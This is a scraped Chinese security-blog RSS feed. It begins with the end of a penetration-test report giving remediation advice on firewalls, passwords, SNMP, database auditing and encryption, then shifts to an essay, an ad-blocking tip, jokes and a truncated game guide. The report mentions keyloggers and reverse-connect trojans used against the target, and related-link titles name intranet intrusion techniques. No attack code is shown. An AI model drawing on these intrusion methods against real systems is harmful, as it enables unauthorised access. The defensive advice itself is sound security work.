<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015111BIm.jpg" alt="" /></p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015111mKw.jpg" alt="" /></p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015111Vp4.jpg" alt="" /></p>
<p>在 渗透测试完成之后，所以在过程中利用到的记录器以及工具反弹木马都已经删除，系统恢复原状.此次渗透中获取的一些商业信息已完全删除.</p>
<p>并提 交报告于目标的网络管理员。</p>
<p>目标系统的安全加固和安全问题和解决参考</p>
<p><span style="color: #6d5887;">3.1</span> 访问控制</p>
<p>1.       防火墙访问控制策略配置不完善，没有完全发挥边界防护的作用，内网数据存在泄露到外网的可能。</p>
<p>解决办法：</p>
<p>根据业务和安全需求调整访问控制策略，去掉冗余的规则，做到 最小化原则。如细化防火墙对应用服务区域的访问控制策略等。</p>
<p>2.       没有修改网络设备的默认口令，可能造成非授权人员的访问。</p>
<p>解决办法：</p>
<p>设置一个足够复杂的强口令并定期更换，同时在交换机上做访问控制规则，对登录设备的IP进行限 制。</p>
<p>3.       防火墙的管理仅使用一个超级用户。</p>
<p>解决办法：</p>
<p>根据业务需求，重新分配用户和权限，做到权责分明。</p>
<p>4.       操作系统帐号/口令策略采用默认设置</p>
<p>解决办法：</p>
<p>加强帐号/口令策略安全配置，增强当前服务器用户口令强度，并加强对特权用户远程登录的控制和管 理，使用SSH加密方式对服务器进行远程管理，以防用户/口令信息泄露。</p>
<p>员工密码安 全意识薄弱，可以对员工进行安全培训</p>
<p>5.       目标系统管理员访问控制存在安全隐患</p>
<p>解决办法：</p>
<p>管理员（内部员工）访问目标系统应设定严格的访问控制措施，如基于IP地址，MAC，只允许管理员 （内部员工）在设定的IP地址对系统进行操作，避免因管理员（内部员工）帐户/密码泄漏给系统带来的威胁。</p>
<p><span style="text-decoration: underline;"><span style="color: #6d5887;">3.1</span></span>电信和网络安全</p>
<p>6.       防火墙没有启用足够的抗攻击等防护功能</p>
<p>解决办法：</p>
<p>启用防火墙必要的抗攻击功能。</p>
<p>1、 可在根据日志审计的统计数据辅助设置开启抗攻击功能的阀值,FW上每个访问控制规则的日志也要接入，但防火墙抗网络攻击的能力和范围有限。</p>
<p>2.或者在防火墙前面架设电信级IPS，可抵御大部分网络攻击和拒绝服务攻击</p>
<p><span style="text-decoration: underline;"><span style="color: #6d5887;">3.2</span></span>安全管理与实践</p>
<p>7.       部分设备还没有开启日志审计功能，使得潜在的攻击事件不具备追溯性</p>
<p>解决办法：</p>
<p>尽快部署专业日志审计服务器实现对设备日志的收集、存放和审计。</p>
<p>8.      互联网区没有划分安全域</p>
<p>解决办法：</p>
<p>启用核心交换机 第三层功能，根据业务需求划分VLAN，并在VLAN之间实施适当的访问控制。</p>
<p>1.  在交换机上根据业务类型或者功能划分VLAN，可缓解业务高峰时的网络风暴的威胁，但须事先做好路由规划</p>
<p>2. 在各个安全域边界架设网络防火墙来防止因单一安全区域的蠕虫木马的扩散。</p>
<p>3. 在交换机上启用IP策略设定和禁止内部访问外部陌生地址.</p>
<p><span style="text-decoration: underline;"><span style="color: #6d5887;">3.3</span></span>应用和系统开发 安全</p>
<p>9.       操作系统没有关闭默认启动的冗余服务</p>
<p>解决办法：</p>
<p>根据业务需要，只开启必须的服务，关闭冗余的服务。避免冗余服务所带来的安全隐患</p>
<p>10.               数据库监听器配置</p>
<p>解决办法：</p>
<p>修改监听器配置，为监听器配置口令，这样对监听器进行操作时必须先输入口令进行认证；修改监听器配 置参数，将“ADMIN_RESTRICTIONS”设为“ON”，这样在监听器运行时将禁止通过命令对监听器进行任何修改，必须手动修改监听器配置文件 listener.ora才可以对监听器配置进行修改。</p>
<p>11.               数据库当前没有启用审计</p>
<p>解决办法：</p>
<p>启用数据库的审计功能或者部署专业的数据库审计系统对数据库系统管理、安全管理、数据维护、用户登 录等事件进行审计，并由专人负责数据库的审计管理。</p>
<p>为了避免数据库开启监听功能后带 来的性能问题，可以部署数据库安全审计设备。</p>
<p>12.               管理服务器存在高风险漏洞</p>
<p>解决办法</p>
<p>对用于集中对应用服务器和数据库服务器进行远程管理的PC服务器安装最新的安全补丁。</p>
<p>1.        在网络中架设补丁分发管理系统</p>
<p>2.        在网络中架设漏洞扫描器，可及时了解网络中的设备的漏洞情况</p>
<p>3.        对麦咖啡企业级防火软件设定管理密码，防止他人更改安全设置</p>
<p>13.               目标系统登录密码安全策略控制不严</p>
<p>解决办法</p>
<p>此次目标系统中应提高密码复杂度的要求，对用户密码进行检查，以提高用户密码的安全级别，如必须是 数字和字母的组合等；定义可尝试输入密码的次数和对尝试输入密码采取相应安全策略，如连续输入3次错误密码，将锁定用户一小时等，防止恶意人员对用户的密 码暴力破解。</p>
<p>14.               目标WEB系统异常输入检验机制存在缺陷</p>
<p>解决办法</p>
<p>根据实际情况对输入参数进行严格检查，包括输入字符的长度、类型，并对一些特殊字符进行过滤。在 WEB服务器前面架设WEB应用防火墙可以定义非法字符的过滤策略。</p>
<p>15.               交换机使用默认的SNMP连接串</p>
<p>解决办法</p>
<p>设置一个具备一定复杂度的SNMP连接串。</p>
<p>1.       在交换机上修改。命令参考：</p>
<p>Router(config)#snmp-server community  public/private RO</p>
<p>2.   在网络中架设漏洞扫描器可以检测出该漏洞</p>
<p><span style="text-decoration: underline;"><span style="color: #6d5887;">3.4</span></span>加密</p>
<p>16.               目标系统的通信未采取加密措施</p>
<p>解决办法</p>
<p>对目标WEB数据传输进行加密，如采用https方式。更高安全级别考虑，建议考虑使用SSL  vpn或HTTPS解决方案。</p>
<p><span>一.    目标系统安全加固解决办法总结</span></p>
<p>渗透测试发现的问题中，大多数是可以通过对现有的网络设备、安全设备、WEB数据库、WEB服务器、中间件等进行配置优化调节来解决的。但 是仍然有几个问题是目前无法通过现有网络资源解决的，我们总结了一下大概有以下三点：</p>
<p>加密：可以对目标的数据传输进行加密</p>
<p>应用与系统安全：目标WEB系统异常输入检验机制</p>
<p>应用与系统安全：数据库安全审计</p>
<p>3.1       加密</p>
<p>目前解决目标数据传输进行加密有两种办法：</p>
<p>在WEB应用系统软件上面开启HTTPS传输功能。</p>
<p>HTTPS是以安 全为目标的HTTP通道，简单讲是HTTP的安全版。它的主要作用可以分为两种：一种是建立一个信息安全通道，来保证数据传输的安全；另一种就是确认网站 的真实性。HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议要比http协议安全。</p>
<p>但是我认为在WEB应用软件上面开启这项功能并不适用目标的员工办公系统以及为客户提供服务的系 统。因为HTTPS服务器是需要对传输的数据加密和解压的，大规模的部署势必会严重影响WEB服务器的运行性能，最终导致服务器拒绝服务。</p>
<p>在WEB应用服 务器前架设 SSL VPN加速器。</p>
<p>总结</p>
<p>古 话说的好“堡垒最容易从内部突破”此次渗透案例正是诠释了这句话的.<br />
<h3>相关文章</h3>
<ul class="related_post">
<li><a href="http://www.4shell.org/archives/1462.html" title="域内网中的信息收集之一内网结构的探测">域内网中的信息收集之一内网结构的探测</a></li>
<li><a href="http://www.4shell.org/archives/1343.html" title="内网渗透中SSh的巧用">内网渗透中SSh的巧用</a></li>
<li><a href="http://www.4shell.org/archives/1168.html" title="内网渗透心得">内网渗透心得</a></li>
<li><a href="http://www.4shell.org/archives/238.html" title="高级内网渗透工具:Paris (创建VPN)">高级内网渗透工具:Paris (创建VPN)</a></li>
<li><a href="http://www.4shell.org/archives/111.html" title="大企业内网渗透的常见软件级突破点">大企业内网渗透的常见软件级突破点</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1613.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>为什么近几年公开的技术交流越来越少</title>
		<link>http://www.4shell.org/archives/1592.html</link>
		<comments>http://www.4shell.org/archives/1592.html#comments</comments>
		<pubDate>Mon, 01 Mar 2010 01:42:30 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[影音娱乐]]></category>
		<category><![CDATA[大杂烩]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1592.html</guid>
		<description><![CDATA[这个问题很复杂，说是说不清楚的，只能扯一扯。先扯个大概吧。
首先，得明确一点：任何人都没有义务公开自己的研究，任何人都没有权利要求别人公开自己的研究——尤其是那些自己没公开过什么的人。不过似乎不少人 都有自己的一套理论，能够找出充分的理由来为此义愤填膺，就像七八岁的小男孩得不到想要的游戏机一般义愤填膺。
从我这些年的经验来看，在英语世界里，北欧技术交流气氛最好。其次是中欧，再次西欧，美国排最后。为什么呢，因为像瑞士、瑞典、芬兰这样的披着资本 主义狼皮的社会主义国家里，在超市干三年收银员就可以买栋房子，人们永远不担心没钱看病，不担心失业。所以，人家搞技术的动力基本上都是马斯洛四层以上， 咱们这样还得兼顾三层以下的，跟人家没法比。
但是咱们毕竟也是社会主义国家，虽然是初级阶段，但大家好歹都还不至于挣扎在一二层，所以贴点文章，聊点问题，也很合逻辑。但是这几年情况有有些变 化。
首先，一个根源问题是整个信息安全技术的基础部分已经差不多都码完了。各种理论和技术都很成熟，该有的文档也都有了。再要搞点什么东西，基本上都是 建立在一堆参考资源之上的实际应用。而越接近实用的东西，越不会有人愿意往外放。这个道理很容易理解：你随便到哪个书店都能买到讲E=MC²、原子裂变， 甚至如何浓缩铀等等这些高深理论的书，但是绝对买不到哪怕制造原子弹外壳的具体配方。
如果整个大环境还保持在2003年之前的状态，可爱的Hacker们倒也不会太在乎实用不实用。但是世道毕竟变了。一部分人开始挣黑钱，他们当然就 不会再跟别人分享发家致富的秘方。而另外一些没去挣黑钱的，也不会愿意把自己的东西白白送给别人拿去发家致富，宁可搞出来自娱自乐，然后烂在地里。于是， 最近几年虽然国内搞这玩意的人多了，水平高的人也多了，但是真正高水平的公开交流却少了。
客观原因摆在这里，所以抱怨毫无意义，绝对不会改变什么。
不过我前面也已经说过了，其实这一块儿的基础文档已经很齐备了，无论你想学什么，都可以找到资料。除非你并不真的想学，只是给自己学不会找个理由而 已。
相关文章

《阿凡达》告诉我们：谁胯下的鸟大就听谁的
经典n则
看看当年的2B版&#8221;Dir溢出&#8221;娱乐一下
汇报漏洞时，我所面对的几种公司态度
雷人版《潇洒走一回》
你以前没看过的99句互联网上暴强语录
超强牛人酒后驾驶面对记者还摆出各种POSE
从蜗居看老男人的魅力
Blog搬家成功
【转载】我和老公的那些害羞事儿

]]></description>
			<content:encoded><![CDATA[<p>这个问题很复杂，说是说不清楚的，只能扯一扯。先扯个大概吧。</p>
<p>首先，得明确一点：任何人都没有义务公开自己的研究，任何人都没有权利要求别人公开自己的研究——尤其是那些自己没公开过什么的人。不过似乎不少人 都有自己的一套理论，能够找出充分的理由来为此义愤填膺，就像七八岁的小男孩得不到想要的游戏机一般义愤填膺。</p>
<p>从我这些年的经验来看，在英语世界里，北欧技术交流气氛最好。其次是中欧，再次西欧，美国排最后。为什么呢，因为像瑞士、瑞典、芬兰这样的披着资本 主义狼皮的社会主义国家里，在超市干三年收银员就可以买栋房子，人们永远不担心没钱看病，不担心失业。所以，人家搞技术的动力基本上都是马斯洛四层以上， 咱们这样还得兼顾三层以下的，跟人家没法比。</p>
<p>但是咱们毕竟也是社会主义国家，虽然是初级阶段，但大家好歹都还不至于挣扎在一二层，所以贴点文章，聊点问题，也很合逻辑。但是这几年情况有有些变 化。</p>
<p>首先，一个根源问题是整个信息安全技术的基础部分已经差不多都码完了。各种理论和技术都很成熟，该有的文档也都有了。再要搞点什么东西，基本上都是 建立在一堆参考资源之上的实际应用。而越接近实用的东西，越不会有人愿意往外放。这个道理很容易理解：你随便到哪个书店都能买到讲E=MC²、原子裂变， 甚至如何浓缩铀等等这些高深理论的书，但是绝对买不到哪怕制造原子弹外壳的具体配方。</p>
<p>如果整个大环境还保持在2003年之前的状态，可爱的Hacker们倒也不会太在乎实用不实用。但是世道毕竟变了。一部分人开始挣黑钱，他们当然就 不会再跟别人分享发家致富的秘方。而另外一些没去挣黑钱的，也不会愿意把自己的东西白白送给别人拿去发家致富，宁可搞出来自娱自乐，然后烂在地里。于是， 最近几年虽然国内搞这玩意的人多了，水平高的人也多了，但是真正高水平的公开交流却少了。</p>
<p>客观原因摆在这里，所以抱怨毫无意义，绝对不会改变什么。</p>
<p>不过我前面也已经说过了，其实这一块儿的基础文档已经很齐备了，无论你想学什么，都可以找到资料。除非你并不真的想学，只是给自己学不会找个理由而 已。<br />
<h3>相关文章</h3>
<ul class="related_post">
<li><a href="http://www.4shell.org/archives/1590.html" title="《阿凡达》告诉我们：谁胯下的鸟大就听谁的">《阿凡达》告诉我们：谁胯下的鸟大就听谁的</a></li>
<li><a href="http://www.4shell.org/archives/1564.html" title="经典n则">经典n则</a></li>
<li><a href="http://www.4shell.org/archives/1467.html" title="看看当年的2B版&#8221;Dir溢出&#8221;娱乐一下">看看当年的2B版&#8221;Dir溢出&#8221;娱乐一下</a></li>
<li><a href="http://www.4shell.org/archives/1463.html" title="汇报漏洞时，我所面对的几种公司态度">汇报漏洞时，我所面对的几种公司态度</a></li>
<li><a href="http://www.4shell.org/archives/1450.html" title="雷人版《潇洒走一回》">雷人版《潇洒走一回》</a></li>
<li><a href="http://www.4shell.org/archives/1380.html" title="你以前没看过的99句互联网上暴强语录">你以前没看过的99句互联网上暴强语录</a></li>
<li><a href="http://www.4shell.org/archives/1378.html" title="超强牛人酒后驾驶面对记者还摆出各种POSE">超强牛人酒后驾驶面对记者还摆出各种POSE</a></li>
<li><a href="http://www.4shell.org/archives/1376.html" title="从蜗居看老男人的魅力">从蜗居看老男人的魅力</a></li>
<li><a href="http://www.4shell.org/archives/1347.html" title="Blog搬家成功">Blog搬家成功</a></li>
<li><a href="http://www.4shell.org/archives/1324.html" title="【转载】我和老公的那些害羞事儿">【转载】我和老公的那些害羞事儿</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1592.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>让千千静听不再弹出广告</title>
		<link>http://www.4shell.org/archives/1591.html</link>
		<comments>http://www.4shell.org/archives/1591.html#comments</comments>
		<pubDate>Mon, 01 Mar 2010 01:34:05 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[千千静听]]></category>
		<category><![CDATA[小技巧]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1591.html</guid>
		<description><![CDATA[1、打开千千静听的安装 目录，删除里面的"info"文件夹 (如果有的话)
2、新建一个文本文档，然后将其命名为"info"，注意不要保留任何扩展名，不要保留成 “info.txt”喔。
Windows默认情况下是隐藏了扩展名的，显示扩展名的方法：打开资源管理器&#62;工具&#62;文件夹选项&#62; 查看&#62;高级设置&#62;去掉“不显示已经文件类型的扩展名”前面的勾确定即可.
这样就不会再弹出广告了，一切清静了。其实这个原理很 简单，就是让千千静听不能创建名为info的文件夹，那个文件夹的作用是保存弹出广告的。
相关文章

手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】
MySQL导入数据库文件最大限制2048KB的修改解决办法
wp-postviews和Wp Super Cache有冲突
流量过大，不得不启用WP Super Cache
 让 Windows 开机自动拨号上网
防止.NET木马列所有站物理路径，防止.JPG类型木马
some shit tips
360 模拟点击demo
当渗透中实时检测管理员的bat
利用注射点判断数据库web是否分离

]]></description>
			<content:encoded><![CDATA[<p>1、打开千千静听的安装 目录，删除里面的"info"文件夹 (如果有的话)<br />
2、新建一个文本文档，然后将其命名为"info"，注意不要保留任何扩展名，不要保留成 “info.txt”喔。<br />
Windows默认情况下是隐藏了扩展名的，显示扩展名的方法：打开资源管理器&gt;工具&gt;文件夹选项&gt; 查看&gt;高级设置&gt;去掉“不显示已经文件类型的扩展名”前面的勾确定即可.</p>
<p>这样就不会再弹出广告了，一切清静了。其实这个原理很 简单，就是让千千静听不能创建名为info的文件夹，那个文件夹的作用是保存弹出广告的。<br />
<h3>相关文章</h3>
<ul class="related_post">
<li><a href="http://www.4shell.org/archives/1476.html" title="手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】">手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】</a></li>
<li><a href="http://www.4shell.org/archives/1156.html" title="MySQL导入数据库文件最大限制2048KB的修改解决办法">MySQL导入数据库文件最大限制2048KB的修改解决办法</a></li>
<li><a href="http://www.4shell.org/archives/1110.html" title="wp-postviews和Wp Super Cache有冲突">wp-postviews和Wp Super Cache有冲突</a></li>
<li><a href="http://www.4shell.org/archives/1109.html" title="流量过大，不得不启用WP Super Cache">流量过大，不得不启用WP Super Cache</a></li>
<li><a href="http://www.4shell.org/archives/1088.html" title=" 让 Windows 开机自动拨号上网"> 让 Windows 开机自动拨号上网</a></li>
<li><a href="http://www.4shell.org/archives/1035.html" title="防止.NET木马列所有站物理路径，防止.JPG类型木马">防止.NET木马列所有站物理路径，防止.JPG类型木马</a></li>
<li><a href="http://www.4shell.org/archives/1024.html" title="some shit tips">some shit tips</a></li>
<li><a href="http://www.4shell.org/archives/1018.html" title="360 模拟点击demo">360 模拟点击demo</a></li>
<li><a href="http://www.4shell.org/archives/771.html" title="当渗透中实时检测管理员的bat">当渗透中实时检测管理员的bat</a></li>
<li><a href="http://www.4shell.org/archives/769.html" title="利用注射点判断数据库web是否分离">利用注射点判断数据库web是否分离</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1591.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>《阿凡达》告诉我们：谁胯下的鸟大就听谁的</title>
		<link>http://www.4shell.org/archives/1590.html</link>
		<comments>http://www.4shell.org/archives/1590.html#comments</comments>
		<pubDate>Mon, 22 Feb 2010 01:43:53 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[乱七八糟]]></category>
		<category><![CDATA[大杂烩]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1590.html</guid>
		<description><![CDATA[1.《孔子》观感：这已经不是一个子多曰几下就能忽悠人的年代了。
2. 我举报一个又色情，又低俗，又反华的艺人名字——黄日华。请组织部敏感词他！
3.从今天起，做一个高尚的人。再不发负面状态。上网就扫黄，出街就反日。再穿一身黑装，面朝烈士，含泪湿嚎。
4.小时候/低俗是一盘小小的磁带 /我在这头/ 丽君在那头；后来啊/ 低俗是一团窄窄的纸条 /我在后头/ 女生在前头；长大后/  低俗是一张薄薄的光盘 /我在这头/ 电视在那头； 而现在/ 低俗是一条短短的信息 /我在里头/ 警察在外头。
5.  春哥之后的又一防挂科神作——挂柯南，挂科难。如果你有科比的海报，就别挂柯南，否则“不挂科比挂柯南”；单独使用科比海报亦可，因为“挂科比不挂柯 南”！
6.10086因发送宣传短信“一次性交纳五百元送话费”，被封号！
7.80后者，未及义务教育之免费，不见高等学校之分配，适值扩招，寒窗数载，二十三乃成。觅生计，背井离乡，东渡苏浙，南下湖广，西上志愿，北漂京都， 蓄十万。楼市暴涨，遂投股市，翌年缩水。气急入院，无医保而返。友怜之，送三鹿，饮之，卒。
8.韩寒：从今天起，做一个低俗的人，劈腿翻墙，周游世界；从今天起，污染粮食和蔬菜，我有一个房子，面向大海，却被强拆。
9.所谓幸福的事：1.不用拼爹竟找到好工作；2.不用献身竟遇到好导演；3.不用买房竟娶到好媳妇；4.不用送礼竟遇到好大夫；5.不用鉴定竟有了亲儿 子；6.不用行贿竟得到好生意；7.不用装逼竟交到真朋友；8.不用认爹竟遇到好领导。
10.考试是指行为人以强迫他人读书为目的，以书面形式摧残他人身心的行为。有以下三种情形之一的，法定刑加重：1.考试致人挂科、重修或以挂科、重修相 威胁的；2.考试难度过高致人身心受损的；3.考前不划重点、不划范围、不给方向的……
11.整个学期全荒废，临近考试全心碎，一周时间全没睡，考试之前全在背，走进考场全崩溃，拿到卷子全流泪，背的东西全不考，考的东西全不会。
12.《阿凡达》就是人族挖暗夜的矿，暗夜没有攀技术树，前期被压制，基地树被干掉，暗夜只能出英雄，升级操控火龙，暴骑兵飞鸟，人族出动全部兵力，陆空 配合强推暗夜，暗夜经过恶战，眼看就要GG了，突然出作弊器，地图上所有中立生物进攻人族，结果就是人族被翻盘。
13.曹操出土后答记者问：你死在洛阳，为何选在安阳建墓穴？  曹：首都房价太贵，二线城市便宜。问：陪你沉睡千年的女人到底是谁？答：嘘，她是貂蝉，字海藻。问：最后可否谈谈你对这个新时代的看法？答：孤已用名字回 复。
14.我用一麻袋的钱上大学，换了一麻袋书；毕业了，用这些书换钱，却买不起一个麻袋！
15.宅男费纸，宅女费电！
16.《阿凡达》告诉我们：谁胯下的鸟大就听谁的。
17.昨日，李宇春在湖南长沙发布记者会，会上首次正面回应了网络上广为流传的“信春哥，得永生”等热门词句。李宇春说：“你们信我也好，不信我也好，你 们总归都要死的。”在场的许多记者都流下了感动的眼泪！
18.同学家吃的晚饭，回家发了短信和他说“你妈的红烧肉棒极了”。结果今天手机不能发短信了。
19.小爷缺钱缺女人缺心眼,就是他妈的不缺德！
20.上海自来水来自海上，日照老年人年老照日，大波美人鱼人美波大，明天到操场操到天明，哥曾信佛但佛信曾哥，人过大佛寺佛大过人！
22.丰胸的四种结果：1.大不一样 2.不大一样 3.一样不大 4.不一样大
23. 百度被黑的真相：因为伊朗兄弟上百度买火箭筒，结果被竞价排名的假货给骗了。
24.婚期将到，国内兄弟，有钱公寓，没钱蜗居，望长城内外，大厦高楼，工地上下，人浪滔滔，早起晚睡，达旦通宵，丈母娘说：买个房子才达标。须钞票，看 人山人海，一房难搞。 楼价如此虚高，引无数英雄竞折腰，昔秦皇汉武，见此摇头，唐宗宋祖，更是没招，一代天骄，成吉思汗，只好住在蒙古包！
相关文章

为什么近几年公开的技术交流越来越少
经典n则
看看当年的2B版&#8221;Dir溢出&#8221;娱乐一下
汇报漏洞时，我所面对的几种公司态度
雷人版《潇洒走一回》
你以前没看过的99句互联网上暴强语录
超强牛人酒后驾驶面对记者还摆出各种POSE
从蜗居看老男人的魅力
Blog搬家成功
【转载】我和老公的那些害羞事儿

]]></description>
			<content:encoded><![CDATA[<p>1.《孔子》观感：这已经不是一个子多曰几下就能忽悠人的年代了。<br />
2. 我举报一个又色情，又低俗，又反华的艺人名字——黄日华。请组织部敏感词他！<br />
3.从今天起，做一个高尚的人。再不发负面状态。上网就扫黄，出街就反日。再穿一身黑装，面朝烈士，含泪湿嚎。<br />
4.小时候/低俗是一盘小小的磁带 /我在这头/ 丽君在那头；后来啊/ 低俗是一团窄窄的纸条 /我在后头/ 女生在前头；长大后/  低俗是一张薄薄的光盘 /我在这头/ 电视在那头； 而现在/ 低俗是一条短短的信息 /我在里头/ 警察在外头。<br />
5.  春哥之后的又一防挂科神作——挂柯南，挂科难。如果你有科比的海报，就别挂柯南，否则“不挂科比挂柯南”；单独使用科比海报亦可，因为“挂科比不挂柯 南”！<br />
6.10086因发送宣传短信“一次性交纳五百元送话费”，被封号！<br />
7.80后者，未及义务教育之免费，不见高等学校之分配，适值扩招，寒窗数载，二十三乃成。觅生计，背井离乡，东渡苏浙，南下湖广，西上志愿，北漂京都， 蓄十万。楼市暴涨，遂投股市，翌年缩水。气急入院，无医保而返。友怜之，送三鹿，饮之，卒。<br />
8.韩寒：从今天起，做一个低俗的人，劈腿翻墙，周游世界；从今天起，污染粮食和蔬菜，我有一个房子，面向大海，却被强拆。<br />
9.所谓幸福的事：1.不用拼爹竟找到好工作；2.不用献身竟遇到好导演；3.不用买房竟娶到好媳妇；4.不用送礼竟遇到好大夫；5.不用鉴定竟有了亲儿 子；6.不用行贿竟得到好生意；7.不用装逼竟交到真朋友；8.不用认爹竟遇到好领导。<br />
10.考试是指行为人以强迫他人读书为目的，以书面形式摧残他人身心的行为。有以下三种情形之一的，法定刑加重：1.考试致人挂科、重修或以挂科、重修相 威胁的；2.考试难度过高致人身心受损的；3.考前不划重点、不划范围、不给方向的……<br />
11.整个学期全荒废，临近考试全心碎，一周时间全没睡，考试之前全在背，走进考场全崩溃，拿到卷子全流泪，背的东西全不考，考的东西全不会。<br />
12.《阿凡达》就是人族挖暗夜的矿，暗夜没有攀技术树，前期被压制，基地树被干掉，暗夜只能出英雄，升级操控火龙，暴骑兵飞鸟，人族出动全部兵力，陆空 配合强推暗夜，暗夜经过恶战，眼看就要GG了，突然出作弊器，地图上所有中立生物进攻人族，结果就是人族被翻盘。<br />
13.曹操出土后答记者问：你死在洛阳，为何选在安阳建墓穴？  曹：首都房价太贵，二线城市便宜。问：陪你沉睡千年的女人到底是谁？答：嘘，她是貂蝉，字海藻。问：最后可否谈谈你对这个新时代的看法？答：孤已用名字回 复。<br />
14.我用一麻袋的钱上大学，换了一麻袋书；毕业了，用这些书换钱，却买不起一个麻袋！<br />
15.宅男费纸，宅女费电！<br />
16.《阿凡达》告诉我们：谁胯下的鸟大就听谁的。<br />
17.昨日，李宇春在湖南长沙发布记者会，会上首次正面回应了网络上广为流传的“信春哥，得永生”等热门词句。李宇春说：“你们信我也好，不信我也好，你 们总归都要死的。”在场的许多记者都流下了感动的眼泪！<br />
18.同学家吃的晚饭，回家发了短信和他说“你妈的红烧肉棒极了”。结果今天手机不能发短信了。<br />
19.小爷缺钱缺女人缺心眼,就是他妈的不缺德！<br />
20.上海自来水来自海上，日照老年人年老照日，大波美人鱼人美波大，明天到操场操到天明，哥曾信佛但佛信曾哥，人过大佛寺佛大过人！<br />
22.丰胸的四种结果：1.大不一样 2.不大一样 3.一样不大 4.不一样大<br />
23. 百度被黑的真相：因为伊朗兄弟上百度买火箭筒，结果被竞价排名的假货给骗了。<br />
24.婚期将到，国内兄弟，有钱公寓，没钱蜗居，望长城内外，大厦高楼，工地上下，人浪滔滔，早起晚睡，达旦通宵，丈母娘说：买个房子才达标。须钞票，看 人山人海，一房难搞。 楼价如此虚高，引无数英雄竞折腰，昔秦皇汉武，见此摇头，唐宗宋祖，更是没招，一代天骄，成吉思汗，只好住在蒙古包！<br />
<h3>相关文章</h3>
<ul class="related_post">
<li><a href="http://www.4shell.org/archives/1592.html" title="为什么近几年公开的技术交流越来越少">为什么近几年公开的技术交流越来越少</a></li>
<li><a href="http://www.4shell.org/archives/1564.html" title="经典n则">经典n则</a></li>
<li><a href="http://www.4shell.org/archives/1467.html" title="看看当年的2B版&#8221;Dir溢出&#8221;娱乐一下">看看当年的2B版&#8221;Dir溢出&#8221;娱乐一下</a></li>
<li><a href="http://www.4shell.org/archives/1463.html" title="汇报漏洞时，我所面对的几种公司态度">汇报漏洞时，我所面对的几种公司态度</a></li>
<li><a href="http://www.4shell.org/archives/1450.html" title="雷人版《潇洒走一回》">雷人版《潇洒走一回》</a></li>
<li><a href="http://www.4shell.org/archives/1380.html" title="你以前没看过的99句互联网上暴强语录">你以前没看过的99句互联网上暴强语录</a></li>
<li><a href="http://www.4shell.org/archives/1378.html" title="超强牛人酒后驾驶面对记者还摆出各种POSE">超强牛人酒后驾驶面对记者还摆出各种POSE</a></li>
<li><a href="http://www.4shell.org/archives/1376.html" title="从蜗居看老男人的魅力">从蜗居看老男人的魅力</a></li>
<li><a href="http://www.4shell.org/archives/1347.html" title="Blog搬家成功">Blog搬家成功</a></li>
<li><a href="http://www.4shell.org/archives/1324.html" title="【转载】我和老公的那些害羞事儿">【转载】我和老公的那些害羞事儿</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1590.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AVA战地之王三大兵种技能、勋章获得方法</title>
		<link>http://www.4shell.org/archives/1589.html</link>
		<comments>http://www.4shell.org/archives/1589.html#comments</comments>
		<pubDate>Sun, 21 Feb 2010 02:09:28 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[影音娱乐]]></category>
		<category><![CDATA[AVA]]></category>
		<category><![CDATA[战地之王]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1589.html</guid>
		<description><![CDATA[在ava游戏中兵种是有“技能”和“勋章”的设定，而不同兵种“技能”又有所不同，　　为了让玩家更全面的了解ava的 “技能”和“勋章”概念，下面就具体介绍一下：
一   如何查看ava游戏中不同兵种技能
玩家在“游戏大厅”→“我的信息”→“技能信息”→“兵种技能”就可以查看所在账号中各个兵 种的技能获得情况。

二如何获得ava游戏中不同兵种的技能
1侦查兵技能的获得方式





侦察兵技能全部获得后，就会得到“侦察兵队长纪念章”并获得5000游戏币

2步枪兵技能的获得方式





步Qiang技能全部获得后，就会得到“步**队长纪念章”并获得5000游戏币

3狙击手技能的获得方式





狙击手技能全部获得后，就会得到“狙击手队长纪念章”并获得5000游戏币

三ava游戏中不同兵种的重要技能解析
1侦察兵
相较另外两个兵种侦察兵的技能获得比较容易，但是一定要注意“战场了解术”是侦察兵最有用的的技能， “高级战场了解术”与“基本战场了解术”的分别是前者小地图的战场可视范围更大。

2步Qiang手　 　步Qiang手的技能是最难练的，尤其是“投掷训练”和“瞄准射击”中的“手雷伤害”和“爆头”很多时候运气占很大的成分。     但是步**的技能中的“防御术”和“致命伤害防御术”又恰恰是所有兵种最实用的技能，下面有一组公式仅供玩家参考。　　“致命伤害防御术”　　1.头盔防 御技能:能增加头盔的吸收能力与耐久度，经过测试基本为15%左右　　2.2:高级头盔防御技能:能增加头盔的吸收能力与耐久度,经过测试基本为30%左 右　　“防御术”　　1.初级防御技能:能增加武器吸收**伤害的效果,经过计算为2%左右　　2.中级防御技能:能增加武器吸收**伤害的效果,经过计 算为5%左右　　3:高级防御技能:能增加武器吸收**伤害的效果,经过计算为8%左右
3狙击手　　狙击手的技能获得方式介于其它两种兵种之间，只是“***训练”需要切换到***射杀这 对擅长远距离狙击手们来说是不小的挑战。
四ava游 戏勋章系统
